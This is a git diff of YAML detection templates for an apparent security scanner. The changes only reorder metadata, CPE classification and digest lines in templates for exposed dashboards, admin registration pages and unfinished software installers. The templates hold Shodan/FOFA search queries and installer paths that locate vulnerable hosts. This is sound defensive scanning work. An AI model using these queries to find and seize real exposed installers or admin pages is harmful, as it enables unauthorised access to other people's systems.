+# digest: 4a0a0047304502202d61741c08f70714d01c829cdb9e46bca026f4fbb12a2d340e5f22c6a9f8db1d022100be0f2a08785ef366f0cfa8f4cd9be3c27edb8f4f65f4fbd5316fe18662a3c664:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml
index fb7974e4e8..48bc193137 100644
--- a/http/misconfiguration/grav-register-admin.yaml
+++ b/http/misconfiguration/grav-register-admin.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Exposed Grav admin user register page.
+ classification:
+ cpe: cpe:2.3:a:getgrav:grav_admin:*:*:*:*:grav:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Grav Register Admin User"
- product: grav_admin
vendor: getgrav
+ product: grav_admin
+ shodan-query: title:"Grav Register Admin User"
tags: grav,register,admin,misconfig
- classification:
- cpe: cpe:2.3:a:getgrav:grav_admin:*:*:*:*:grav:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100fee93345e98c4b7f5f6b1346f747fae537d02194b62d3c9c653542d472b10d7a02200ad9542dc8d977f677e61266dc7d2aecb4d540ced8f44ec80086f6d8705f0916:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100fee93345e98c4b7f5f6b1346f747fae537d02194b62d3c9c653542d472b10d7a02200ad9542dc8d977f677e61266dc7d2aecb4d540ced8f44ec80086f6d8705f0916:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/h2o/h2o-dashboard.yaml b/http/misconfiguration/h2o/h2o-dashboard.yaml
index c9de98e6d9..90df75e86b 100644
--- a/http/misconfiguration/h2o/h2o-dashboard.yaml
+++ b/http/misconfiguration/h2o/h2o-dashboard.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
H2o dashboard by default has no authentication and can lead to RCE on the host.
+ classification:
+ cpe: cpe:2.3:a:h2o:h2o:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"H2O Flow"
- product: h2o
vendor: h2o
+ product: h2o
+ shodan-query: title:"H2O Flow"
tags: misconfig,exposure,h2o,ml,unauth
- classification:
- cpe: cpe:2.3:a:h2o:h2o:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -23,6 +23,7 @@ http:
redirects: true
max-redirects: 2
+
matchers-condition: and
matchers:
- type: word
@@ -40,4 +41,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ee21c15fb3a2cb2198efd560f30f90f725fd4eb8ab56e8e0cca48143e5f8fb0602210094e9651f477ea39f953e7175ce6b94649516d10db3a2484797638c4dabc8bbed:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ee21c15fb3a2cb2198efd560f30f90f725fd4eb8ab56e8e0cca48143e5f8fb0602210094e9651f477ea39f953e7175ce6b94649516d10db3a2484797638c4dabc8bbed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml
index 0b6afce018..13ead1420d 100644
--- a/http/misconfiguration/haproxy-exporter-metrics.yaml
+++ b/http/misconfiguration/haproxy-exporter-metrics.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: low
description: Haproxy metrics is exposed.
+ classification:
+ cpe: cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"haproxy exporter"
- product: haproxy
vendor: haproxy
+ product: haproxy
+ shodan-query: title:"haproxy exporter"
tags: haproxy,exposure,debug,misconfig
- classification:
- cpe: cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402200655ee70596afce87e1d8db4b3082d84aa6b0da7a5861afb56a96f843e11fb20022069d40c4579c0ab2134a278af489c32581bcc20920ef60ada17b6749c1c838b3d:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200655ee70596afce87e1d8db4b3082d84aa6b0da7a5861afb56a96f843e11fb20022069d40c4579c0ab2134a278af489c32581bcc20920ef60ada17b6749c1c838b3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/helm-dashboard-exposure.yaml b/http/misconfiguration/helm-dashboard-exposure.yaml
index b1e1288d53..d20af7961a 100644
--- a/http/misconfiguration/helm-dashboard-exposure.yaml
+++ b/http/misconfiguration/helm-dashboard-exposure.yaml
@@ -4,16 +4,16 @@ info:
name: Helm Dashboard - Exposure
author: DhiyaneshDk
severity: medium
+ classification:
+ cpe: cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-594722214
- product: helm
vendor: helm
+ product: helm
+ shodan-query: http.favicon.hash:-594722214
tags: helm,exposure,dashboard,misconfig
- classification:
- cpe: cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200c928d3466fb2afc7ef3a518d29bf10ebf5fd16c91a849dacf733fe69d35f371022100c8c2066577de94aad09b500fcb4c77b506257299d6a97b8cda35db7983d14fe9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200c928d3466fb2afc7ef3a518d29bf10ebf5fd16c91a849dacf733fe69d35f371022100c8c2066577de94aad09b500fcb4c77b506257299d6a97b8cda35db7983d14fe9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/hfs-exposure.yaml b/http/misconfiguration/hfs-exposure.yaml
index 5d656e450e..3fa455f8b5 100644
--- a/http/misconfiguration/hfs-exposure.yaml
+++ b/http/misconfiguration/hfs-exposure.yaml
@@ -4,16 +4,16 @@ info:
name: HFS Exposure
author: tess
severity: unknown
+ classification:
+ cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"HFS /"
- product: http_file_server
vendor: rejetto
+ product: http_file_server
+ shodan-query: title:"HFS /"
tags: misconfig,hfs,exposure
- classification:
- cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
status:
- 200
-# digest: 4a0a004730450221009c93d685673dae37425f299006a5cc6265d6e90c9190eee3f515dcef66b599d402206dc49172d96ff4f03df26148a45305ed49c4523fe56517c7c4c24db3d52d1bb2:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450221009c93d685673dae37425f299006a5cc6265d6e90c9190eee3f515dcef66b599d402206dc49172d96ff4f03df26148a45305ed49c4523fe56517c7c4c24db3d52d1bb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/hp/unauthorized-printer-hp.yaml b/http/misconfiguration/hp/unauthorized-printer-hp.yaml
index 2edb5cb765..4c1b39b642 100644
--- a/http/misconfiguration/hp/unauthorized-printer-hp.yaml
+++ b/http/misconfiguration/hp/unauthorized-printer-hp.yaml
@@ -5,15 +5,15 @@ info:
author: pussycat0x,r3naissance
severity: high
description: HP office pro printer web access is exposed.
- metadata:
- max-request: 2
- shodan-query: http.title:"Hp Officejet pro"
- product: officejet_pro_8730_m9l80a
- vendor: hp
- tags: hp,iot,unauth,misconfig
-
classification:
cpe: cpe:2.3:h:hp:officejet_pro_8730_m9l80a:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: hp
+ product: officejet_pro_8730_m9l80a
+ shodan-query: http.title:"Hp Officejet pro"
+ tags: hp,iot,unauth,misconfig
+
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022036d37039d912ae59424a671dd9c349844585972c295d1f7acf85d745b211afb1022100976c9be00188085d703986b94ef6b8c11cf10ec28e9772b729eadded1dac8181:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022036d37039d912ae59424a671dd9c349844585972c295d1f7acf85d745b211afb1022100976c9be00188085d703986b94ef6b8c11cf10ec28e9772b729eadded1dac8181:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml
index a38e63f162..b1729cb9ac 100644
--- a/http/misconfiguration/ibm-friendly-path-exposure.yaml
+++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml
@@ -7,15 +7,15 @@ info:
description: Finds friendly path exposed that can be used to access signup page and create new user accounts.
reference:
- https://clarkvoss.medium.com/how-to-harpon-big-blue-c163722638d8
- metadata:
- max-request: 5
- shodan-query: http.html:"IBM WebSphere Portal"
- product: websphere_portal
- vendor: ibm
- tags: ibm,exposure,websphere,misconfig
-
classification:
cpe: cpe:2.3:a:ibm:websphere_portal:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 5
+ vendor: ibm
+ product: websphere_portal
+ shodan-query: http.html:"IBM WebSphere Portal"
+ tags: ibm,exposure,websphere,misconfig
+
http:
- method: GET
path:
@@ -49,4 +49,5 @@ http:
regex:
- "Content-Location: .+"
negative: true
-# digest: 490a0046304402201c5eb880703621112635885e53f9cfafcbb265895a9e6e3e0566c4145a9219460220209f7384c05171450191229a29dea42cff94633d4cf821765179db3bed060082:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402201c5eb880703621112635885e53f9cfafcbb265895a9e6e3e0566c4145a9219460220209f7384c05171450191229a29dea42cff94633d4cf821765179db3bed060082:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/activecollab-installer.yaml b/http/misconfiguration/installer/activecollab-installer.yaml
index ac397b505a..17efe378aa 100644
--- a/http/misconfiguration/installer/activecollab-installer.yaml
+++ b/http/misconfiguration/installer/activecollab-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed ActiveCollab Installation page.
reference:
- https://activecollab.com/
+ classification:
+ cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"ActiveCollab Installer"
- product: activecollab
vendor: activecollab
+ product: activecollab
+ shodan-query: html:"ActiveCollab Installer"
tags: misconfig,install,exposure,activecollab
- classification:
- cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022034b524d9ad8e4a38f42b3f47439047de2cdf505cea9c303acbcf771f8620210e02200e0c6e8c487c6c1d0d03d1b140b0914cd8e9df100b051d57a6c5f2047d14b2fa:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022034b524d9ad8e4a38f42b3f47439047de2cdf505cea9c303acbcf771f8620210e02200e0c6e8c487c6c1d0d03d1b140b0914cd8e9df100b051d57a6c5f2047d14b2fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/adguard-installer.yaml b/http/misconfiguration/installer/adguard-installer.yaml
index c8cd375caf..5c7ceec039 100644
--- a/http/misconfiguration/installer/adguard-installer.yaml
+++ b/http/misconfiguration/installer/adguard-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
AdGuard Installation panel has been exposed.
- metadata:
- max-request: 1
- verified: true
- fofa-query: title="Setup AdGuard Home"
- product: adguard
- vendor: adguard
- tags: adguard,misconfig,install
-
classification:
cpe: cpe:2.3:a:adguard:adguard:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: adguard
+ product: adguard
+ fofa-query: title="Setup AdGuard Home"
+ tags: adguard,misconfig,install
+
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100f8a5710c842b60de55abc85e4049c343b837a0ada6f830040985caddfd526346022051d746f4754b723bce5d892a7a8f118ff7dde18894b91679a8e663ce25e79e8b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100f8a5710c842b60de55abc85e4049c343b837a0ada6f830040985caddfd526346022051d746f4754b723bce5d892a7a8f118ff7dde18894b91679a8e663ce25e79e8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/alma-installer.yaml b/http/misconfiguration/installer/alma-installer.yaml
index cc7441efa2..e31e8fb3f7 100644
--- a/http/misconfiguration/installer/alma-installer.yaml
+++ b/http/misconfiguration/installer/alma-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: high
description: Alma is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:almapay:alma:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Alma Installation"
- product: alma
vendor: almapay
+ product: alma
+ shodan-query: title:"Alma Installation"
tags: misconfig,alma,install,exposure
- classification:
- cpe: cpe:2.3:a:almapay:alma:*:*:*:*:wordpress:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c6250654d85fbaf80fbfeb1011ad7902c233e811ca4b2ecd51079239fd1d4998022100f44bc592a98719ffc09c63d53bbc99ce6798630a5618ca1693cf6aa6fda70b84:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c6250654d85fbaf80fbfeb1011ad7902c233e811ca4b2ecd51079239fd1d4998022100f44bc592a98719ffc09c63d53bbc99ce6798630a5618ca1693cf6aa6fda70b84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/ampache-music-installer.yaml b/http/misconfiguration/installer/ampache-music-installer.yaml
index 19e379ee9c..e571de098c 100644
--- a/http/misconfiguration/installer/ampache-music-installer.yaml
+++ b/http/misconfiguration/installer/ampache-music-installer.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: high
description: Ampache Music is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"For the Love of Music - Installation"
- product: ampache
vendor: ampache
+ product: ampache
+ shodan-query: title:"For the Love of Music - Installation"
tags: misconfig,ampache,install,exposure
- classification:
- cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220605ea50cd6b226cdbce1435b6626cd250bc67ac9f560eece87174fc44f6f93b20220135a1b12364086757ef627dd5560776ee8ba1cff657acf8cc6204cfb783bb52a:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220605ea50cd6b226cdbce1435b6626cd250bc67ac9f560eece87174fc44f6f93b20220135a1b12364086757ef627dd5560776ee8ba1cff657acf8cc6204cfb783bb52a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml
index b4bfd9966b..a887105bc7 100644
--- a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml
+++ b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: info
description: Atlassian Bamboo is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Bamboo setup wizard"
- product: bamboo
vendor: atlassian
+ product: bamboo
+ shodan-query: title:"Bamboo setup wizard"
tags: misconfig,atlassian,bamboo,setup,installer
- classification:
- cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100a0a7c51e9771528342f49f71f03697f0c10adb7f1e3761e2fc6f9991b79b6098022100ac2f6cf82c9d9e98262befba3b97ca787883dd2d806b60fb9ccb3c19c88f8890:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100a0a7c51e9771528342f49f71f03697f0c10adb7f1e3761e2fc6f9991b79b6098022100ac2f6cf82c9d9e98262befba3b97ca787883dd2d806b60fb9ccb3c19c88f8890:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/bagisto-installer.yaml b/http/misconfiguration/installer/bagisto-installer.yaml
index dcce31941f..d631e22d4d 100644
--- a/http/misconfiguration/installer/bagisto-installer.yaml
+++ b/http/misconfiguration/installer/bagisto-installer.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: Bagisto is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Bagisto Installer"
- product: bagisto
vendor: webkul
+ product: bagisto
+ shodan-query: http.title:"Bagisto Installer"
tags: misconfig,bagisto,install,exposure
- classification:
- cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221008b73e4ad96e1f51d647d1dbbe0cc021942038823d651e366a631627031caabc6022100e276eda2bd5d639c74569bf84080e9213406b99673a93d94883bc319ce400809:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221008b73e4ad96e1f51d647d1dbbe0cc021942038823d651e366a631627031caabc6022100e276eda2bd5d639c74569bf84080e9213406b99673a93d94883bc319ce400809:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/bitrix24-installer.yaml b/http/misconfiguration/installer/bitrix24-installer.yaml
index 3e622c2dd5..39a2adfa75 100644
--- a/http/misconfiguration/installer/bitrix24-installer.yaml
+++ b/http/misconfiguration/installer/bitrix24-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK
severity: high
description: Bitrix24 is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-2115208104
- product: bitrix24
vendor: bitrix24
+ product: bitrix24
+ shodan-query: http.favicon.hash:-2115208104
tags: misconfig,bitrix24,install,exposure
- classification:
- cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502210091ee1386f473f7e0a8e534f84272c12cc950892a3524ab4bd88ba7b1343109db02206aa8ba2c3174fb8688acb3860aa67aba0c259635e2e1725512694e96f6f2640a:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502210091ee1386f473f7e0a8e534f84272c12cc950892a3524ab4bd88ba7b1343109db02206aa8ba2c3174fb8688acb3860aa67aba0c259635e2e1725512694e96f6f2640a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml
index d4b05ffc9e..aaf518b9cc 100644
--- a/http/misconfiguration/installer/call-com-installer.yaml
+++ b/http/misconfiguration/installer/call-com-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed Call.com Setup page.
reference:
- https://cal.com/
+ classification:
+ cpe: cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: body="Setup | Cal.com"
- product: cal.com
vendor: cal
+ product: cal.com
+ fofa-query: body="Setup | Cal.com"
tags: misconfig,install,exposure,cal
- classification:
- cpe: cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220279f9da2572a41913a0eb3bf60b546901afd18ad7278c3fa0d440bc58b60d39702200505b5407d2986b988c9a939e0294228166102d509b4fc3f60c287a81143c523:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220279f9da2572a41913a0eb3bf60b546901afd18ad7278c3fa0d440bc58b60d39702200505b5407d2986b988c9a939e0294228166102d509b4fc3f60c287a81143c523:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/chamilo-installer.yaml b/http/misconfiguration/installer/chamilo-installer.yaml
index 8ba6f1d41a..0be3471514 100644
--- a/http/misconfiguration/installer/chamilo-installer.yaml
+++ b/http/misconfiguration/installer/chamilo-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Chamilo is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"Chamilo has not been installed"
- product: chamilo
vendor: chamilo
+ product: chamilo
+ shodan-query: title:"Chamilo has not been installed"
tags: misconfig,chamilo,install,exposure
- classification:
- cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -22,6 +22,7 @@ http:
- '{{BaseURL}}/main/install/index.php'
stop-at-first-match: true
+
matchers-condition: or
matchers:
- type: word
@@ -35,4 +36,5 @@ http:
part: body
words:
- 'Chamilo has not been installed '
-# digest: 490a0046304402205b0756c019bb7b1abbd48a0dc259ed7353203f0f8b43c1ab9ea2c23e06c47cc4022076c08eb4ab70f68d187c606b7148288a27ee88f825dd94d9a6133bdca0eda950:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205b0756c019bb7b1abbd48a0dc259ed7353203f0f8b43c1ab9ea2c23e06c47cc4022076c08eb4ab70f68d187c606b7148288a27ee88f825dd94d9a6133bdca0eda950:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/clipbucket-installer.yaml b/http/misconfiguration/installer/clipbucket-installer.yaml
index 5b570d7d44..c309e60464 100644
--- a/http/misconfiguration/installer/clipbucket-installer.yaml
+++ b/http/misconfiguration/installer/clipbucket-installer.yaml
@@ -5,17 +5,17 @@ info:
author: DhiyaneshDk
severity: high
description: ClipBucket is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:clip-bucket:clipbucket:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: clip-bucket
+ product: clipbucket
shodan-query: http.favicon.hash:538583492
fofa-query: icon_hash="538583492"
- product: clipbucket
- vendor: clip-bucket
tags: misconfig,clipbucket,install,exposure
- classification:
- cpe: cpe:2.3:a:clip-bucket:clipbucket:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100b0232e0f9d6cc10a6b6b81af15074c2d3071badba75eb623cd7395ab80c7a0f9022011fb63fbd16492a3889ae16290c0d8af40631603dfecb07a53490e3283c38142:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100b0232e0f9d6cc10a6b6b81af15074c2d3071badba75eb623cd7395ab80c7a0f9022011fb63fbd16492a3889ae16290c0d8af40631603dfecb07a53490e3283c38142:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/cloudcenter-Installer.yaml b/http/misconfiguration/installer/cloudcenter-Installer.yaml
index a9824dad6b..a6bdc8bf05 100644
--- a/http/misconfiguration/installer/cloudcenter-Installer.yaml
+++ b/http/misconfiguration/installer/cloudcenter-Installer.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: unknown
description: CloudCenter is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"CloudCenter Installer"
- product: cloudcenter
vendor: cisco
+ product: cloudcenter
+ shodan-query: title:"CloudCenter Installer"
tags: misconfig,cisco,cloudcenter,install,exposure
- classification:
- cpe: cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022031c0d953e9c0ac319d7fd76c22f1a1da2f4713e73faa5a0ab3e33a7b41a3dc66022100f7f1f7c008cd9010950a91333afd5f396f973825ae374a4322b2dcf7f52468c9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022031c0d953e9c0ac319d7fd76c22f1a1da2f4713e73faa5a0ab3e33a7b41a3dc66022100f7f1f7c008cd9010950a91333afd5f396f973825ae374a4322b2dcf7f52468c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/codeigniter-installer.yaml b/http/misconfiguration/installer/codeigniter-installer.yaml
index 58f2b14282..e033f54822 100644
--- a/http/misconfiguration/installer/codeigniter-installer.yaml
+++ b/http/misconfiguration/installer/codeigniter-installer.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: unknown
description: Codeigniter Application is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Codeigniter Application Installer"
- product: codeigniter
vendor: codeigniter
+ product: codeigniter
+ shodan-query: http.title:"Codeigniter Application Installer"
tags: misconfig,codeigniter,install,exposure
- classification:
- cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205f5a7be95611a09d7ddfed23dd31623ab52be56be04a6dad23b28f5d4c1ae50f02204ecdc564640c43c3a3b70a31e63ce90ac35606079e31f5dd5c0c3ebb59fac106:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205f5a7be95611a09d7ddfed23dd31623ab52be56be04a6dad23b28f5d4c1ae50f02204ecdc564640c43c3a3b70a31e63ce90ac35606079e31f5dd5c0c3ebb59fac106:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/combodo-itop-installer.yaml b/http/misconfiguration/installer/combodo-itop-installer.yaml
index a1183f7db8..c01b6abfc2 100644
--- a/http/misconfiguration/installer/combodo-itop-installer.yaml
+++ b/http/misconfiguration/installer/combodo-itop-installer.yaml
@@ -7,16 +7,16 @@ info:
description: Combodo iTop is susceptible to the Installation page exposure due to misconfiguration.
reference:
- https://www.itophub.io/wiki/page?id=2_4_0:install:install_wizard
+ classification:
+ cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"Installation" html:"itop"
- product: itop
vendor: combodo
+ product: itop
+ shodan-query: html:"Installation" html:"itop"
tags: misconfig,itop,install,exposure
- classification:
- cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220471fdc699623440130dd74256b7869b21664828661f159a94535029f6c2c2e45022100da8b7c1e8bef0e17c904d5fa71cc374b4d1d05bcc995195d8f13adc7a1ace2a8:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220471fdc699623440130dd74256b7869b21664828661f159a94535029f6c2c2e45022100da8b7c1e8bef0e17c904d5fa71cc374b4d1d05bcc995195d8f13adc7a1ace2a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/concrete-installer.yaml b/http/misconfiguration/installer/concrete-installer.yaml
index 312f64f518..1d4d17883f 100644
--- a/http/misconfiguration/installer/concrete-installer.yaml
+++ b/http/misconfiguration/installer/concrete-installer.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: high
description: Concrete is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:concretecms:concrete_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Install concrete"
- product: concrete_cms
vendor: concretecms
+ product: concrete_cms
+ shodan-query: title:"Install concrete"
tags: misconfig,exposure,install,concrete
- classification:
- cpe: cpe:2.3:a:concretecms:concrete_cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100aee4c924c2e7aa89a7cf5c5e8a62ffa301ab5bf24ac02ebfe4a50c52fb5247fe022100fe66bcf33dc4c5b8a7b3ba0ac201fdf08641b402364e0b685115bd990834e9b5:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100aee4c924c2e7aa89a7cf5c5e8a62ffa301ab5bf24ac02ebfe4a50c52fb5247fe022100fe66bcf33dc4c5b8a7b3ba0ac201fdf08641b402364e0b685115bd990834e9b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/connectwise-setup.yaml b/http/misconfiguration/installer/connectwise-setup.yaml
index 9b5d91fde1..de864e2d08 100644
--- a/http/misconfiguration/installer/connectwise-setup.yaml
+++ b/http/misconfiguration/installer/connectwise-setup.yaml
@@ -4,16 +4,16 @@ info:
name: ConnectWise Setup Wizard - Exposure
author: DhiyaneshDk
severity: high
+ classification:
+ cpe: cpe:2.3:a:connectwise:control:*:*:*:*:*:*:*:*
